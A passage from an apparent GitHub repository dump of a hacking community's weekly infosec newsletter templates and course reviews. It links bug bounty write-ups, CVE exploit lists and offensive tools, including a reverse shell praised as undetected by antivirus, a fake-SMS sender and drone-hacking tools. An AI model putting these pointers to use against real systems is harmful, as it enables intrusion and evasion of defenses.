\n4. Reverse Engineering & OSINT - 3 Tools \n \n - **4. Reverse Engineering & OSINT Tools** - 3\n - [PE-bear](https://github.com/hasherezade/pe-bear) is a multiplatform reversing tool for PE files. Its objective is to deliver fast and flexible “first view” for malware analysts, stable and capable to handle malformed PE files.\n - [uosint](https://github.com/uosint-project/uosint) -> Find The Profiles Of A Person On Social Networks. \n - [TRIFECTA](https://github.com/V1XX-1/TRIFECTA-Search-Tool) -> A batch script that allows you to search a phrase or keywords with 12 different search engines. You can do so one at a time or all at once. \n\n
\n\n
\n5. IoT, OS & Hardware - 3 \n \n - **5. IoT, OS & Hardware** - 3\n \n - [CiLocks](https://github.com/tegal1337/CiLocks) -> Crack Interface lockscreen, Metasploit and More Android/IOS Hacking.\n - [Cotopaxi](https://github.com/Samsung/cotopaxi) - Set of tools for security testing of Internet of Things devices using specific network IoT protocols.\n - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) -> Drone Hacking Tool is a GUI tool that works with a USB Wifi adapter and HackRF One for hacking drones.\n\n
\n
\n \n ---\n##### Wrapping Up\n\n Have questions, Suggestions, or feedback? Just reply directly to mail, I'd love to hear from you.\n \n If you find this update useful and know other people who would too, I'd really appreciate if you'd forward it to them ??\n Thanks for reading!\n\n\n\n" }, { "path": "ResetCybersecuirty/WIUAsset/WIU_Templete/WIU_v0.3.md", "content": " #### Hey Hackers, I hope you’ve been doing well! \n Here are the Agenda for \"Weekly infosec Update\" 04 (23rd - 30th Aug 2022) \n \n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n

\"Pentesting-Bugbounty//ResetCybersecuirty/\"

\n\n \n\n---\n\n#### We started working on \"Weekly Infosec Update\" because It's very time consuming to monitor the InfoSec Community on twitter, telegram, reddit. discord and visiting security website every day. \nWe had no idea we’d end up releasing \"Weekly Infosec Update\" every Wednesday. Huge thanks to our awesome [Community Leader to contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team.\n\nContributors : - Good Resources Share, Paul miller, [Tarang Parmar](https://github.com/TarangParmar), [Tuhin Bose](https://github.com/tuhin1729), Vikram and Alexandre ZANNI ([@noraj](https://github.com/noraj) Github Moderator).\n\n---\n\n### Let's start the Week recap, and my apology for So much Info. We're finding a way to make it shorter.\n\n### 🏛️🏛️🏛️ HIRING, WORKSHOP & TRAINNING 🏛️🏛️🏛️\n\n**Here we talk about and share resources related to Jobs, Ongoing Workshop and free trainning offered by organization, community and leader.**\n\n1. Let's Talk about [Internship/Job Opening in Aug 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n2. Here We have collected [Interview Questions asked by organization while Hiring](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n3. Free SANS Workshop: [Building an Azure Pentest Lab for Red Teams](https://www.sans.org/webcasts/sans-workshop-building-azure-pentest-lab-red-teams/)\n\n### 📆📆📆 EVENTS, TALKS & WEBINAR 📆📆📆\n\n**This Week Defcon, BlackHat and Liran Tal talk from JSDayCAN22 was mainly trending in infosec community so We have filtered important Talk, Slides, Tools, Weekly Podcast, Youtube Videos and resources releted to Events, Talks & Webinars.**\n\n - In case you're still strugling with finding [Blackhat 2022 all the slides](https://drive.google.com/drive/mobile/folders/1KHx2rKUEdb53flGUN0mFHRdSdB5PUT4B?fbclid=IwAR1C2Fk3XDPU-ky-4B57ZmKtEKgjB6Yg-9m2c6MTxyJd779yPV7MCCHCvWo&fs=e&s=c). This drive have it all. Enjoy :)\n\n - In BlackHat USA 2022, markakd talked about [DirtyCred - A New Exploitation Method! No Pipe but as Nasty as Dirty Pipe](https://github.com/markakd/DirtyCred)\n\n - This article is the “text notes” version of @spaceraccoon talk at DEF CON 30 Cloud Village. [Exploiting Improper Validation of Amazon Simple Notification Service SigningCertUrl](https://spaceraccoon.dev/exploiting-improper-validation-amazon-simple-notification-service/) - The talk was not recorded so this is the only public version of it.\n\n - [How React Applications Get Hacked in the Real-World – Liran Tal](https://youtu.be/f16lELnFTNI) : [Slide](https://slides-react-security-lightning-talk-2022.vercel.app/1) -> By using React we are completely safe when it comes to sanitizing user input right? Liran scarily points out that in fact although React does cover most cases for us, dynamic href attributes are not encoded so can be susceptible to XSS attacks 😱. It’s therefore important that if we are to expose some user input via href we should always prefix the protocol (https://) and use relative paths!\n\n---\n\n### 🪲🪲🪲 CVE : poc exploit and cve analysis 🪲🪲🪲\n\n#### Week -> [23rd - 30th August 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md)\n\n**There are tens of thousands of vulnerabilities disclosed each year. Only a handful of them will ever be exploited So In this Section, Every Week we filter out [CVE poc exploit and analysis writeups that have Higher Severity](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).** If you don't play with CVE then please skip this Section.\n \n CVE POC exploit : CVE-2022-32250, CVE-2022-37042, CVE-2022-38766, CVE-2022-23779, CVE-2022-32250-Linux-Kernel-LPE, \n CVE-2022-22715 , CVE-2022-37153, CVE-2022-2884, CVE-2022-2586 and CVE-2022-LPE-UAF.\n \n CVE Analysis : CVE-2022-20233, Multiple CVE in TENDA, CVE-2022-24787, CVE-2022-33318, CVE-2022-2884, CVE-2022-26377, \n CVE-2020-2733 and CVE-2022-30129. \n \n### 🐞🐞🐞 BUG BOUNTY : report, vulnerability Writeups and resources 🐞🐞🐞\n\n *1. In This Segment, We have filtered out **HACKERONE/BUGCROWD REPORT** for Bug Hunters :*\n \n - [$4000 Pause-based desync in Apache HTTP Server 2.4.52 and earlier (CVE-2022-22720)](https://hackerone.com/reports/1667974) fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling.\n - [Privilege Escalation - \"Analyst\" Role Can View Email Domains of a Company - [GET /voyager/api/voyagerOrganizationDashEmailDomainMappings]](https://hackerone.com/reports/1572591)\n \n *2. In This Segment We Collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES:** *\n \n - [$4,000 Command Injection in the GitHub Pages Build Pipeline](https://blog.nietaanraken.nl/posts/github-pages-command-injection/)\n - [Somdev Sangwan - Hacking ModSecurity leads to WAF bypass, Code injection and RCE](https://s0md3v.github.io/blog/modsecurity-rce-bypass)\n - [€1500 - Break the Logic: 5 Different Perspectives in Single Page](https://infosecwriteups.com/break-the-logic-5-different-perspectives-in-single-page-1500-5aa09da0fe7a)\n - [rez0 reference for why IDORs with unpredictable IDs are valid vulnerabilities](https://rez0.blog/hacking/cybersecurity/2022/08/18/unpredictable-idors.html)\n - [Bypassing Amazon WAF to pop an alert()](https://infosecwriteups.com/bypassing-amazon-waf-to-pop-an-alert-4646ce35554e)\n - [Out-Of-Bond Remote code Execution(RCE) on De Nederlandsche Bank N.V. with burp-suite collaborator](https://infosecwriteups.com/out-of-bond-remote-code-execution-rce-on-de-nederlandsche-bank-n-v-with-burp-suite-collaborator-2ce50260e2e4)\n - [a simple IDOR + Authorization vulnerability](https://monish-basaniwal.medium.com/the-million-dollar-hack-8163892bfe2f) to expose thousands of Visa gift cards on a leading gift card company’s website + Bonus: Found a way to redeem them more than once.\n - [Bug Hunting Search Engine- A community curated resources for bug bounty hunting](https://bugbountyhunting.com)\n \n\n### 🥇🥈🥉 OUR 6 FAVORITE FROM INFOSEC : article, whitepaper & statistics report 🥇🥈🥉\n \n - [Google announces launching Google’s Open Source Software Vulnerability Rewards Program (OSS VRP) to reward discoveries of vulnerabilities in Google’s open source projects](https://security.googleblog.com/2023/08/Announcing-Googles-Open-Source-Software-Vulnerability-Rewards-Program%20.html?m=1). As the maintainer of major projects such as Golang, Angular, and Fuchsia, Google is among the largest contributors and users of open source in the world. With the addition of Google’s OSS VRP to our family of Vulnerability Reward Programs (VRPs), researchers can now be rewarded for finding bugs that could potentially impact the entire open source ecosystem.\n - [API vulnerabilities discovered and exploited in Q1-2022](https://drive.google.com/file/d/1MuOdfTDC6VRbNKnvHS1jYeOHfoEOi_Ci/view?usp=sharing)\n - [Twitter Whistleblower Document Archive](https://archive.org/download/whistleblower_disclosure)\n - [$100,000 Attacking the Mozilla Firefox Renderer : Browser bug, RCE (Part 2)](https://www.zerodayinitiative.com/blog/2022/8/23/but-you-told-me-you-were-safe-attacking-the-mozilla-firefox-renderer-part-2)\n - [Cujanovic : SSRF (Server Side Request Forgery) testing resources](https://github.com/cujanovic/SSRF-Testing)\n - [Eavesdropping: €8,000,000 does it cost to buy Predator spyware ?](https://www.secnews.gr/417192/ipoklopes-agora-predator-spyware/)\n---\n### 🐦🐦🐦 TWITTER THREAD & TIPS 🐦🐦🐦\n \n - [Detectify shared a thread for Latest CVE submission on their Attack surface platform](https://twitter.com/detectify/status/1564285800086380545?t=V8lXKxykl1rrRZ0gNwBv_A&s=19).\n - [Rapid Api shared a thread on what exactly is CORS?](https://twitter.com/Rapid_API/status/1564621466620018690?t=5acaUewayJaLGyG_7R8fPw&s=19)\n - [Backdoor password in a ZIP!](https://twitter.com/_mohemiv/status/1561044393880178689) \n \n 🔴If you create a compressed file with the following command: 7z a x.zip 1.png -mem=AES256 -p\n Next, enter the following password (the password will not be shown):\n Nev1r-G0nna-G2ve-Y8u-Up-N5v1r-G1nna-Let-Y4u-D1wn-N8v4r-G5nna-D0sert-You\n\n Now decompress the file with the following command and password:\n 7z e x.zip\n\n and the following password:\n pkH8a0AqNbHcdw8GrmSp\n ---\n\n### 🔍🔍🔍 RESEARCHERS, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n **This is one the best Segment If you are a Researcher and want to explore Security, new approach to find vulnerabilty and Infosec Business in depth.** If you're a beginner bug Hunter or junior pentester. you can skip this Section.\n \n - **1 - Web Security, cloud misconfiguration and android security**\n - [API test environment](https://www.getsecureworld.com/blog/what-are-the-api-pentest-requirements/) This interesting article have a questions to perform the API pentesting.\n \n - In This Article, Nozero shared a story where What at first appeared to be minor “password issues” led to a high-risk attack path enabling NodeZero to [access the domain admin accounts, and even break into the organization’s Azure cloud environment](https://www.horizon3.ai/how-nodezero-found-access-to-azure-environment/).\n \n - [Misconfigured Resource-Based Policies - Hacking The Cloud](https://hackingthe.cloud/aws/exploitation/misconfigured_resource-based_policies/)\n \n - [Android security checklist - Theft of arbitrary files](https://blog.oversecured.com/Android-security-checklist-theft-of-arbitrary-files/)\n \n - [cezary-sec/awesome-browser-security](https://github.com/cezary-sec/awesome-browser-security/) \nA curated list of awesome browser security learning material by Opera’s Cezary Cerekwicki. Covers good intro material, security challenges and corresponding mitigations, attacks on browsers, and more.\n\n - [CSRF Vulnerability In The NodeJS 3rd party popular csurf package](https://fortbridge.co.uk/research/a-csrf-vulnerability-in-the-popular-csurf-package/)\n \n - [Chaining Telegram bugs to steal session-related files](https://dphoeniixx.medium.com/chaining-telegram-bugs-to-steal-session-related-files-c90eac4749bd)\n \n- **2 - Blue/Red/Purple/Threat hunting Team**\n - [Threat Hunting Tools: Our Recommendations](https://socprime.com/blog/threat-hunting-tools-our-recommendations/)\n \n - [Endpoint Security: Intuition around the Mudge Disclosures](https://medium.com/starting-up-security/endpoint-security-intuition-around-the-mudge-disclosures-dfbe014790f2) \nGreat post by Ryan McGeehan on the core things you should keep in mind about endpoint security, communicating with senior management, risk scenarios, measuring progress, practical realities, and more.\n \n - [BlueHound: Community Driven Resilience](https://zeronetworks.com/blog/bluehound-community-driven-resilience/)\nZero Networks’s Dekel Paz describes BlueHound, a tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network.\n \n - Hunting for emerging Sliver command-and-control(C2C) frameworks](https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/)\n \n - [Guide to DLL Sideloading](https://crypt0ace.github.io/posts/DLL-Sideloading/) \nDLL Sideloading is a technique related to DLL Hijacking.\n\n - [Hacking WatchGuard firewalls with vulnerability XPath injection, Memory corruption bug, Local Privilege Escalation and RCE](https://www.ambionics.io/blog/hacking-watchguard-firewalls). This article provide you depth on how ambionics Security discover 5 vulnerabilities - 2 patched along the way - and build 8 distinct exploits, and finally obtain an unpatched pre-authentication remote root 0-day on every WatchGuard Firebox/XTM appliance.\n \n - [How Hackers Exploit Exposed Default Welcome Page](https://blog.criminalip.io/2022/08/24/default-welcome-page-exposure/) By searching with the common keywords for Default Welcomoe Pages, can easily find exposed default welcome pages on the vulnerable open web.\n \n - [Investigating .NET CLR Usage Log Tampering Techniques For EDR Evasion (Part 2)](https://bohops.com/2022/08/22/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion-part-2/)\n\n - [On Cryptocurrency Wallet Design – defines access control taxonomy, can be reused e.g. for MFA factors](https://eprint.iacr.org/2021/1522.pdf)\n \n - **4 - Infosec Business** \n\n - In this Article, Haider Mahmood talked about [Information Security Checklist for Small to Medium Organizations](https://haiderm.com/information-security-checklist-for-small-to-medium-organizations/)\n\n - In this Article Author(nozaq) shared his expiriance in detailed and [The to-do list for terminating a payment service](https://engineering.mercari.com/en/blog/entry/20201219-6e7ea87db8/)\n\n - In this article, [Godric Cao share his expiriance when it comes to organizational design](https://engineering.mercari.com/en/blog/entry/20211225-size-backend-team-to-5-to-8-members/) and Factors such as the company’s current phase, efforts to adjust impacting team performance together with team sizes, organization and individual growth paths etc. \n\n---\n\n### 📰📰📰 NEWS 📰📰📰\n\n- **Leaks & BlackHat Hacker:**\n \n - [🟢Data-Leak:LastPass hacked and stolen source code, blueprints of company by intruder](https://www.theregister.com/2022/08/25/lastpass_security/) 🔴Hacking was done by hacking the account of a developer and through that hackers were able to penetrate the development environment inside the company.\n - [🟢Explained: The General Bytes Bitcoin ATM Hack (August 2022)](https://halborn.com/explained-the-general-bytes-bitcoin-atm-hack-august-2022/)\n - [🟢ÆPIC Leak: Architecturally Leaking Uninitialized Data from the Microarchitecture](https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG/view?usp=sharing)\n\n- **Top 5 Infosec News:**\n - [🟢 80,000 Hikvision cameras vulnerable with CVE-2021-36260](https://www.bleepingcomputer.com/news/security/over-80-000-exploitable-hikvision-cameras-exposed-online/) 🔴If you operate a Hikvision camera, you should make it a priority to install the latest available firmware update, use a strong password, and isolate the IoT network from critical assets using a firewall or VLAN.\n - [🟢 Ex-Twitter exec blows the whistle, alleging reckless and negligent cybersecurity policies](https://edition.cnn.com/2022/08/23/tech/twitter-whistleblower-peiter-zatko-security/index.html)🔴One of Twitter's former security chiefs named Peiter \"Mudge\" Zatko has revealed in disclosure about the security and privacy of this platform that include Twitter has major security problems that pose a threat to the personal information of its users, company shareholders, national security, and democracy.\n - [🟢Google Uncovers Tool Used by Iranian Hackers to Steal Data from Email Accounts](https://thehackernews.com/2022/08/google-uncovers-tool-used-by-iranian.html?fbclid=IwAR34LikXAB8_osmMVauu0jAZuDRPbGKkfQRG-fcc2lWnOXZLjO49y3kqmws)\n - [🟢NATO investigating hacker sale of missile firm data](https://www.bbc.co.uk/news/technology-62672184). 🔴Nato says it's assessing the impact of a breach of classified military documents being sold by a hacker group online but the source of the documents is murky.\n - [🟢DuckDuckGo opens its privacy-focused email service to everyone](https://www.bleepingcomputer.com/news/security/duckduckgo-opens-its-privacy-focused-email-service-to-everyone/).\n---\n\n### 🛠️🛠️🛠️ TOOLS 🛠️🛠️🛠️ \n\n*Community test the Tools and we filter out most demanding and helpful tools that suis the hacker Purpose.*\n\n - **1. SAAS/PASS/Recon/Network/Web Pentesting** - 8\n \n - [JWT-Reauth - a plugin aims to provide a painless solution to this issue](https://research.nccgroup.com/2022/08/25/tool-release-jwt-reauth/). JWT-Reauth provides Burp with a way to authenticate with a given endpoint, parse out the provided token and then attach it as a header on requests going to a given scope. \n \n - [tfsec](https://github.com/aquasecurity/tfsec) -> This Community-driven tool got the popularity for useing static analysis of your terraform code to spot potential misconfigurations across all major cloud provides.\n \n - [hahwul/WebHackersWeapons](https://github.com/hahwul/WebHackersWeapons)-> By Hahwul: A collection of cool tools used by web hackers, grouped by tag and language. Types: Swiss Army Knife, recon, fuzzer, scanner, exploit, utils, etc.\n \n - [Vision2 - Nmap's XML result parse and NVD's CPE correlation to search CVE](https://github.com/CoolerVoid/Vision2)\n \n - [Renko](https://github.com/pablosnt/rekono) -> This Tool got the popularity for combines other hacking tools and its results to execute complete pentesting processes against a target in an automated way. The findings obtained during the executions will be sent to the user via email or Telegram notifications and also can be imported in Defect-Dojo if an advanced vulnerability management is needed. \n \n - [Jscythe](https://github.com/evilsocket/jscythe) -> Abuse the node.js inspector mechanism in order to force any node.js/electron/v8 based process to execute arbitrary javascript code. \n \n - [EtwSessionHijacking](https://github.com/ORCx41/EtwSessionHijacking) -> A Poc on blocking Procmon from monitoring network events.\n \n - [ExchangeFinder](https://github.com/mhaskar/ExchangeFinder) -> Find Microsoft Exchange instance for a given domain and identify the exact version.\n \n - **2. Cloud Security** - 1\n \n - [How to detect suspicious activity in your AWS account by using private decoy resources](https://aws.amazon.com/blogs/security/how-to-detect-suspicious-activity-in-your-aws-account-by-using-private-decoy-resources/) -> AWS’s Maitreya Ranganath and Mark Keating describe how you can create low-cost private decoy AWS resources in your AWS accounts and configure them to generate alerts when they are accessed. See also the awesome [canarytokens.org}(https://canarytokens.org/generate)\n \n - **3. Blue/Red Team, IR and Threat intelligence Tools** - 4\n \n - [RedCloud - Comfy & powerful #RedTeam Infrastructure deployment using #Docker](https://github.com/khast3x/Redcloud). -> It has gain his popularity in Redteam Community because It Harness the cloud's speed for your tools(Metasploit, Empire, GoPhish, vulnerable targets, a fully stacked Kali, and many more). Deploys in minutes. Use and manage it with its polished web interface.\n \n - [Deobfuscate Log4Shell payloads with ease](https://github.com/ox-eye/Ox4Shell) .\n -> Since the release of Log4Shell, many tools were created to obfuscate Log4Shell payloads. This #Blue Team purpose tool by Oxeye lets you unravel the true contents of obfuscated Log4Shell payloads with ease.\n \n - [hoaxshell](https://github.com/t3l3machus/hoaxshell)An unconventional Windows reverse shell, currently undetected by Microsoft Defender and various other AV solutions, solely based on http(s) traffic. \n \n - [Yarang - YARA New Generation](https://github.com/avast/yarang) -> yarang is an experiment focused on new scanning engine for YARA, which is based on compiling YARA ruleset into native code and exposing C API in order to use it anywhere. It uses HyperScan under the hood as a pattern matcher instead of custom Aho-Corasick implementation which YARA rolls.\n \n - **4. OSINT Tools** - 3\n \n - [Geogramint](https://github.com/Alb-310/Geogramint) -> An OSINT Geolocalization tool for Telegram that find nearby users and groups. \n \n - [Moriarty-Project](https://github.com/AzizKpln/Moriarty-Project) -> This tool gives information about the phone number that you entered.\n \n - [fake-sms](https://github.com/machine1337/fake-sms) -> Feature that make this tools interesting include sms anonymously, easy & super fast sms sending, international sms sending available, no charges on sending sms but we have 1 limitation as well you can send only one sms per day. \n \n - **5. IoT, OS & Hardware** - 2 \n \n - [Titan M tools](https://github.com/quarkslab/titanm) -> Attack on Google Titan M, Reloaded: Vulnerability Research on a Modern Security Chip\n \n - [Tangled WinExec](https://github.com/daem0nc0re/TangledWinExec) -> This repository is for investigation of Windows process execution techniques. Most of PoCs are given a name corresponding to the technique.\n\n---\n \n### 🤝🤝🤝 How to get involve in Contribution. #Contact-Us 🤝🤝🤝\n\n

\n \n
\n\n If you quickly want to get involved in making **Weekly Cybersecurity Update** a better, but aren't sure how.\n CONTACT \"@Attr1b\" on Telegram or mail us to \"resethackerofficial@gmail.com\" \n \n Please write a reason, How do you plan to improve it?\n \n### I'm so grateful to all the [Organization and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) without their Writeups, article, findings and whitepaper [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) would not have been possible.\n\n### I'm very grateful to all the [Organization, group, and community that support us for the engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementSupport.md). Without their support reaching \"Weekly InfoSec Update\" to hacker would not have been possible.\n\n### Wrapping Up\n\n Have questions, Suggestions, or feedback? Just reply directly to mail, I'd love to hear from you.\n\n If you find this update useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏\n\n Thanks for reading!\n" }, { "path": "ResetCybersecuirty/WIUAsset/WIU_Templete/WIU_v0.4.md", "content": "### This week we have made some changes in New version of \"Weekly Security Update\" v0.4\n\n1. Added nevigation Bar (called SAVE TIME).\nSo hacker can select the segment and read it without hussle with scrolling.\n\n2. We have Reduce segment from 12 to 7.\nAnd my apology for So much Info. We're finding a way to make it shorter and more user friendly.\n\n---\n\n**Tips to SAVE TIME and How to READ ? **\n- Select the topic from the navbar bellow and click on PRIVIEW to read.:\n\n[![event](https://img.shields.io/badge/-Event-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-event) [![cve poc](https://img.shields.io/badge/-CVE-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![bug bounty](https://img.shields.io/badge/-Bug%20Bounty-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-bb) [![research & Business](https://img.shields.io/badge/-Research-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![news](https://img.shields.io/badge/-News-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-news) [![hiring](https://img.shields.io/badge/-Hiring-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-hiring) [![tools](https://img.shields.io/badge/-Tools-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-tools)\n\n![WIU Agenda Every Wednesday @ 8 AM IST](https://user-images.githubusercontent.com/25515871/189009272-a1a0ecf8-d939-4792-bf0d-53eb9f1c6638.jpg)\n\n\n\n
\n Priview\n\n
\n" }, { "path": "ResetCybersecuirty/WIUAsset/WIU_Templete/helpdesk-Github.md", "content": "

Github HelpDesk & and Documentaion

\n\n

Want to contribute to this project?

\n

📌 Tech Stack

\n\n\n#### [Documentaion](https://docs.github.com/en/get-started/writing-on-github/getting-started-with-writing-and-formatting-on-github/basic-writing-and-formatting-syntax) \n**1.** Documentation Status:\n\n[For link]()\n\n**1.** [![Documentation Status](https://readthedocs.org/projects/resethacker-community/badge/?version=latest)](https://resethacker-community.readthedocs.io/en/latest/?badge=latest)\n\n- Signup with https://readthedocs.org\n\n**2.** [To Generate an image of contributors to keep your README.md in sync.](https://contrib.rocks/preview?repo=angular%2Fangular-ja) \n\n- Visit https://contrib.rocks and enter the repository.\n\n---\n\n#### NavBar\n[![WhatsApp](https://img.shields.io/badge/WhatsApp-25D366?style=for-the-badge&logo=whatsapp&logoColor=white)](https://wa.me/%2B919xxxxxxxx?text=Hello%2C%20I%20am%20here%20from%20the%20'ResetHackers%2Fcommunity'%20GitHub%20Repository.%20)\n[![Discord](https://img.shields.io/badge/Discord-7289DA?style=for-the-badge&logo=discord&logoColor=white)](https://discord.gg/xxxxxxx)\n\n--\n# Use case\n## Use case\n### Use case\n#### Use case\n- This is Test1\n> This is Test2.\n\n-\n\n`git status`\n\n``` This is \n test3\n ``` \n \n ``` This is \n test3\n # or\n test4\n ``` \n-\n\n1. First list item\n - First nested list item\n - Second nested list item\n\n#Tesk List\n- [x] #739\n- [ ] https://github.com/octo-org/octo-repo/issues/740\n- [ ] Add delight to the experience when all tasks are complete :tada:\n\n![Styling Text Github](https://user-images.githubusercontent.com/25515871/195506052-b6cc8de0-159f-4701-bfa5-b40376355bcb.png)\n\n\n@github/support What do you think about these updates?\n\n\nHere is a simple footnote[^1].\n\nA footnote can also have multiple lines[^2]. \n\nYou can also use words, to fit your writing style more closely[^note].\n\n[^1]: My reference.\n[^2]: Every new line should be prefixed with 2 spaces. \n This allows you to have a footnote with multiple lines.\n[^note]:\n Named footnotes will still render with numbers instead of the text but allow easier identification and linking. \n This footnote also has been made with a different syntax using 4 spaces for new lines.\n \n \n### Hiding content with comments \n\n\n\n" }, { "path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Course_Review/CEH.md", "content": "ResetHacker Community : Course Reviews\n\nDISCLAIMER: These are ResetHacker members personal opinions and fellings! Make your own judgment. \n\nDomain | Course Title | Author | Year | Level | Exam : Theory/Practicle | validity | Industry Demand |\n|---|---|---|---|---|---|---|---|\n| Ethical Hacking : Theory/Practicle | CEH v11 | Ec-council | 2022 | Intro/beginner | Yes, Both | 2 years | High |\n\n\n\nIntro : \n \n This was my first course in 2019. This was the \"intro/beginner\" course(Certified Ethical Hacking with Theory based Exam). \n I took after attending an Webinar about Ethical Hacking. If i have to recall It was quite understanable since \n I was attending an offline classes twice in a week and my teacher was reall good for a beginner course.\n \nYour opinion on Why would anyone take this course ?\n\n The course provide you a login credentials to the APSEN portal(entire course resources are available online), 3 Ebook that include 2 for theory and 1 lab manual, an exam voucher, \n and pdf(high quality only for you), Video lecture(average).\n For me lab were at the right level of difficulty but i personally thing if you're getting started and don't have anybackground in cybersecurity\n then you should go for It. Many organizations consider Certified Ethical Hacker certification to be a minimum requirement \n when looking to appoint someone for a cyber security role. This certification may be exactly what you need to get the recruiter’s attention.\n \nExam : \n\n For CEH exam they give you both option Theory/Practicle so better consult your Trainning institute for this.\n For theory-based Exam, you will have no choice but just memorize – I hated this about the course but easy to crack the exam.\n\nExam voucher: \n \n I think that you have an option to purchase this with your training voucher. \n Please keep in mind that the voucher is valid for 12 months. The exam must be taken at a certified exam center.\n \nDislike, Suggesion and opinion on Course/Assignments/Labs/Project and level of difficulty. \n\n This course need to add project to the course so later we can add to ou resume. Labs are good but recommend users \n to setup at very early stage with help of manual or youtube or blogs don't depend on your instructor. \n \nFinal Note:\n\n Incase you want to advance your Pentesting\n Offensive Security Certified Professional (OSCP), EC-Council Certified Security Analyst (ECSA), Licensed Penetration Tester (LPT), etc will be the Next.\n\nRahul Kumar : Team ResetHacker\n" }, { "path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Course_Review/Readme.md", "content": "ResetHacker Community : Course Reviews\n\nDISCLAIMER: These are ResetHacker members personal opinions and fellings! Make your own judgment. \n\nDomain | Course Title | Author | Year | Level | Exam : Theory/Practicle | validity | Industry Demand |\n|---|---|---|---|---|---|---|---|\n| Ethical Hacking : Theory/Practicle | CEH v11 | Ec-council | 2022 | Intro/beginner | Yes, Both | 2 years | High |\n| | | | | | | | |\n| | | | | | | | |\n\n**Keep in mind while writing the reviews**\n \n It is/was your 1st course ?\n Course Level : \"intro/beginner\", Intermidiate and advance.\n Course Mode : Offline/Online\n Your opinion on Why would anyone take this course and level of difficulty. \n Dislike, suggestion and opinion on Course/Assignments/Labs/Project.\n Your opinion instructor.(Optional)\n Exam & Exam voucher.\n Certified Ethical Hacker internship/jobs perspective\n Final Note/Conclusion\n\n 1st Contributor name : XYZ1\n 2nd Contributor name : XYZ2 (If any)\n ......\n Last Updated on Data/Month/Year, Time.\n \n \n Eg : \n \n Intro : \n This was my first course in 2019. This was the \"intro/beginner\" course(Certified Ethical Hacking with Theory based Exam). \n I took after attending an Webinar about Ethical Hacking. If i have to recall It was quite understanable since \n I was attending an offline classes twice in a week and my teacher was reall good for a beginner course.\n \nYour opinion on Why would anyone take this course ?\n\n The course provide you a login credentials to the APSEN portal(entire course resources are available online), 3 Ebook that include 2 for theory \n and 1 lab manual, an exam voucher, pdf(high quality only for you), Video lecture(average).\n For me lab were at the right level of difficulty but i personally thing if you're getting started and don't have any background in cybersecurity\n then you should go for It. \n Many organizations consider Certified Ethical Hacker certification to be a minimum requirement when looking to appoint someone for a cyber security role.\n This certification may be exactly what you need to get the recruiter’s attention.\n \nExam : \n\n For CEH exam they give you both option Theory/Practicle so better consult your Trainning institute for this.\n For theory-based Exam, you will have no choice but just memorize – I hated this about the course but easy to crack the exam.\n\nExam voucher: \n \n I think that you have an option to purchase this with your training voucher. \n Please keep in mind that the voucher is valid for 12 months. The exam must be taken at a certified exam center.\n \nDislike, Suggesion and opinion on Course/Assignments/Labs/Project and level of difficulty. \n\n This course need to add project to the course so Learner can add to our resume. Labs are good but I personally recommend Learners\n to learn How to setup lab at very early stage with help of youtube or blogs etc and don't depend on CEH instructor. \n \nFinal Note:\n\n Incase you want to advance your Pentesting career :\n Offensive Security Certified Professional (OSCP), EC-Council Certified Security Analyst (ECSA), Licensed Penetration Tester (LPT), etc will be the Next.\n\nRahul Kumar : Team ResetHacker\n" }, { "path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Future_updates.md", "content": "# Community Requirenment, Suggestion and feedback :\n\n- Newsletter in TLDR formate.\n- Move to website.\n\n## Bugbounty\n- Parameters to add to your wordlist. for Example[.]com/path/SSRF-PAYLOAD/\n- Latest bug bounty program listed on hackerone/bugcrowd.\n- Case study of Vulneraibity based on Hackeone/bugcrowd/intigriti Reports and Writeups.\n \n Example for Case Study:\n - Case study methodology\n - What functionalities are vulnerable to SSRFs?\n - Vulnerable parameters\n - Which payloads actually work?\n - How are people showing the impact of SSRFs?\n - Conclusions - how to look for SSRFs today?\n - The database with 315 report\n" }, { "path": 